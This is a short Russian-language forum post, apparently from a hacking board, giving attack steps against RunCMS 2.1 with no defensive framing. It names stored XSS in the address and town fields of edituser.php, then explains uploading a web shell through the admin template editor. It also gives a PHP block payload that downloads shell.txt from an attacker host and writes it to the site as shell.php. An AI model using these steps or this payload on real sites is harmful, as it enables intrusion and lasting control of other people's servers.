08.04.2010, 14:39
|
|
Познающий
Регистрация: 11.11.2008
Сообщений: 77
С нами:
9208644
Репутация:
99
|
|
RunCMS 2.1
Active XSS
http://yoursite/edituser.phpПоле address varchar(150) Поле town varchar(60)
Заливка шелла через админку
http://yoursite/modules/system/admin.php?fct=tpleditor
Заливаем zip архив с шеллом.
Шелл будет залит сюда: http://yoursite/themes/shell.php
---------------------------------------------------------
http://yoursite/modules/system/admin.php?fct=blocksadmin
Добавляем новый блок:
Content - сюда вставляем инклюд шелла, например:
PHP код:
$str = file_get_contents("http://hacker-site/shell.txt");
$fp = fopen("shell.php", "w+t");
fwrite($fp, $str);
Content Type - PHP Script
Заходим на страницу содержащую блок или смотрим его preview.
Шелл будет залит сюда: http://yoursite/modules/system/shell.php
Player#1 (c)
|
|
|